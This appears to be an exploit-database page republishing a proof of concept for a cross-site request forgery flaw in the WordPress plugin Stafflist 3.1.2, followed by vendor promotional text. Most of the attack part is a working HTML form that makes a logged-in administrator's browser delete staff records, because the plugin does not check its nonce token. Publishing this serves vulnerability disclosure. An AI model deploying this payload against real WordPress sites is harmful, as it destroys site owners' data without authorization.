Lucene search
K

WordPress Stafflist 3.1.2 Cross Site Request Forgery Vulnerability

🗓️ 03 May 2022 00:00:00Reported by Hassan Khan YusufzaiType 
zdt
 zdt
🔗 0day.today👁 203 Views

WordPress Stafflist 3.1.2 CSRF Vulnerabilit

Code
# Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF (Authenticated)
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/stafflist/
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at] spidersilk.com

# Summary:

A CSRF vulnerability exists in staff record remove functionality in
WordPress Plugin Stafflist 3.1.2.

This vulnerability allows an attacker to delete existing records by
triggring a CSRF html request, due to not validating wp_nouce token in
the request.

# Exploit

As n authenticated user:

<html>
  <body>
    <form action="http://localhost:10003/wp-admin/admin.php">
      <input type="hidden" name="page" value="stafflist" />
      <input type="hidden" name="remove" value="1" />
      <input type="hidden" name="p" value="1" />
      <input type="hidden" name="s" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation